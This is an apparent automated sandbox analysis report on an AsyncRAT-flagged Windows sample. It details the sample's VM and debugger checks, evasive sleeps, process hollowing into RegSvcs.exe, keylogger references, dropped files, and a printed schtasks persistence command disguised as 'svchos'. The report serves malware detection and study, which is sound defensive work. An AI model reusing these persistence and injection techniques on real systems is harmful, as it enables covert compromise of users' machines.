Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: start.exe, 00000017.00000000.2318958962.0000000000C62000.00000002.00000001.01000000.0000000E.sdmp, start.exe, 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Memory allocated: 2C60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Memory allocated: 2E10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Memory allocated: 4E10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Memory allocated: 6520000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Memory allocated: A520000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Memory allocated: A760000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Memory allocated: E760000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory allocated: 1C7CB290000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory allocated: 1C7E4E40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Memory allocated: 1270000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\start.exe Memory allocated: 2EC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\start.exe Memory allocated: 1530000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchos.exe Memory allocated: C20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchos.exe Memory allocated: 2710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchos.exe Memory allocated: 4710000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchos.exe Memory allocated: 1620000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchos.exe Memory allocated: 3390000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchos.exe Memory allocated: 30A0000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Thread delayed: delay time: 3000000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchos.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchos.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Window / User API: threadDelayed 391 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 5430 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 4338 Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchos.exe Window / User API: threadDelayed 8395
Source: C:\Users\user\AppData\Roaming\svchos.exe Window / User API: threadDelayed 1415
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\resources\elevate.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\System.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\libEGL.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\vulkan-1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\d3dcompiler_47.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\libEGL.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\7z-out\vk_swiftshader.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\libGLESv2.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspBED4.tmp\nsis7z.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\build.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\vk_swiftshader.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe TID: 5996 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe TID: 5500 Thread sleep count: 391 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe TID: 6704 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe TID: 3752 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe TID: 5996 Thread sleep time: -3000000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe TID: 3032 Thread sleep time: -55000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe TID: 2196 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchos.exe TID: 6824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchos.exe TID: 6224 Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchos.exe TID: 7700 Thread sleep count: 8395 > 30
Source: C:\Users\user\AppData\Roaming\svchos.exe TID: 7700 Thread sleep count: 1415 > 30
Queries keyboard layouts
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchos.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchos.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Thread delayed: delay time: 3000000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchos.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchos.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\resources
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe File opened: C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6
Source: Amcache.hve.22.dr Binary or memory string: VMware
Source: Amcache.hve.22.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.22.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.22.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.22.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.22.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.22.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.22.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.22.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.22.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.22.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.22.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.22.dr Binary or memory string: vmci.sys
Source: Amcache.hve.22.dr Binary or memory string: vmci.syshbin`
Source: start.exe, 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: Amcache.hve.22.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.22.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.22.dr Binary or memory string: VMware20,1
Source: Amcache.hve.22.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.22.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.22.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.22.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.22.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.22.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.22.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.22.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.22.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.22.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.22.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.22.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Local\Temp\start.exe Process information queried: ProcessInformation
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process queried: DebugPort Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchos.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: svchost (3).exe.15.dr, ----.cs Reference to suspicious API methods: _FD4F.GetProcAddress(: _FDEC_060C_FDDA_FD48_0617_061E._FDD6_FD45_FBB9_064E_FDEA_0654_06D7("\u0610\ufdd0").Replace(_FDEC_060C_FDDA_FD48_0617_061E._FDD6_FD45_FBB9_064E_FDEA_0654_06D7("\u0600\ufdfe\u06e0\ufd4f"), ""), _FDDE_FDE3_FDE8_060D_0652: _FD4F.LoadLibrary(text.Replace(_FDEC_060C_FDDA_FD48_0617_061E._FDD6_FD45_FBB9_064E_FDEA_0654_06D7(""), "")))
Source: svchost (3).exe.15.dr, ----.cs Reference to suspicious API methods: _FD4F.GetProcAddress(: _FDEC_060C_FDDA_FD48_0617_061E._FDD6_FD45_FBB9_064E_FDEA_0654_06D7("\u0610\ufdd0").Replace(_FDEC_060C_FDDA_FD48_0617_061E._FDD6_FD45_FBB9_064E_FDEA_0654_06D7("\u0600\ufdfe\u06e0\ufd4f"), ""), _FDDE_FDE3_FDE8_060D_0652: _FD4F.LoadLibrary(text.Replace(_FDEC_060C_FDDA_FD48_0617_061E._FDD6_FD45_FBB9_064E_FDEA_0654_06D7(""), "")))
Source: svchost (3).exe.15.dr, -.cs Reference to suspicious API methods: ((_066C_FBBC_060F_FDDE_06D9_060E)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary("kernel32.dll"), "VirtualProtect"), typeof(_066C_FBBC_060F_FDDE_06D9_060E)))(_FD47_0607_06EB, _FDCF_06DE_065E, _FBBB_FD49_FDE6_FBCB_FBBB_FDD4_061D_FDD5_0613_06D7_FBC1, out _FBB5_FD48_065B_0658_FDCD_FDDD)
Source: start.exe.15.dr, LimeLogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Section unmapped: unknown base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 414000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AEF008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Process created: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe "C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\svchost (3).exe "C:\Users\user~1\AppData\Local\Temp\svchost (3).exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user~1\AppData\Local\Temp\build.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpAADD.tmp.exe Process created: C:\Users\user\AppData\Local\Temp\start.exe "C:\Users\user~1\AppData\Local\Temp\start.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\user\AppData\Roaming\svchos.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\start.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD46E.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr '"C:\Users\user\AppData\Roaming\svchos.exe"'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\svchos.exe "C:\Users\user\AppData\Roaming\svchos.exe"
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\main" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "C:\Users\user~1\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\main" --mojo-platform-channel-handle=2148 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "c:\users\user~1\appdata\local\temp\2ehfvuyszqzzl8quac9nldhe9q6\main.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\main" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1704 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "c:\users\user~1\appdata\local\temp\2ehfvuyszqzzl8quac9nldhe9q6\main.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\main" --mojo-platform-channel-handle=2148 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "c:\users\user~1\appdata\local\temp\2ehfvuyszqzzl8quac9nldhe9q6\main.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\main" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1704 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Process created: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe "c:\users\user~1\appdata\local\temp\2ehfvuyszqzzl8quac9nldhe9q6\main.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\main" --mojo-platform-channel-handle=2148 --field-trial-handle=1836,i,5338084480249902922,7187138240786215467,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: main.exe, 00000022.00000000.2588365217.00007FF7CDD42000.00000002.00000001.01000000.00000013.sdmp Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Queries volume information: C:\Users\user\Desktop\rU6YAgkoAw.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchost (3).exe Queries volume information: C:\Users\user\AppData\Local\Temp\svchost (3).exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\start.exe Queries volume information: C:\Users\user\AppData\Local\Temp\start.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\start.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchos.exe Queries volume information: C:\Users\user\AppData\Roaming\svchos.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchos.exe Queries volume information: C:\Users\user\AppData\Roaming\svchos.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchos.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchos.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchos.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchos.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\resources VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\resources\app.asar VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2eHfvuySzqzZl8qUAC9nldhe9q6\main.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Users\user\Desktop\rU6YAgkoAw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Yara detected AsyncRAT
Source: Yara match File source: 23.2.start.exe.300be20.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.start.exe.300be20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.start.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000000.2318958962.0000000000C62000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2376656529.000000000300B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: start.exe PID: 368, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\start.exe, type: DROPPED
